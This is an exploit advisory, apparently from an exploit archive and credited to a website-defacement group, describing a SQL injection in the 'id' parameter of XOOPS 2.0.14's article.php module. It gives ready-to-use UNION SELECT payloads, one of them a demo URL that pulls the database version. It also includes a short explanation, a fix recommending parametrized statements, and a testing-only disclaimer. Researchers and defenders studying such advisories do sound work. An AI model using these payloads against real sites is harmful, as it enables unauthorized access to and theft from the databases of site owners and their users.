###
# [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability #
# [#] Discovered By []0iZy5 #
# [#] http://r00tDefaced.com & uNkn0wn.eu(is back) #
# [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members#
###
#
# [2]-SQL injection
#
# Vulnerability Description:
# SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed.
#
# Affected items:
# http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection]
#
# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query]
# Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
#
# The Risk:
# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database.
#
# Fix the vulnerability:
# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered.
#
####
# r00tDefaced.com [28/08/2010]
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum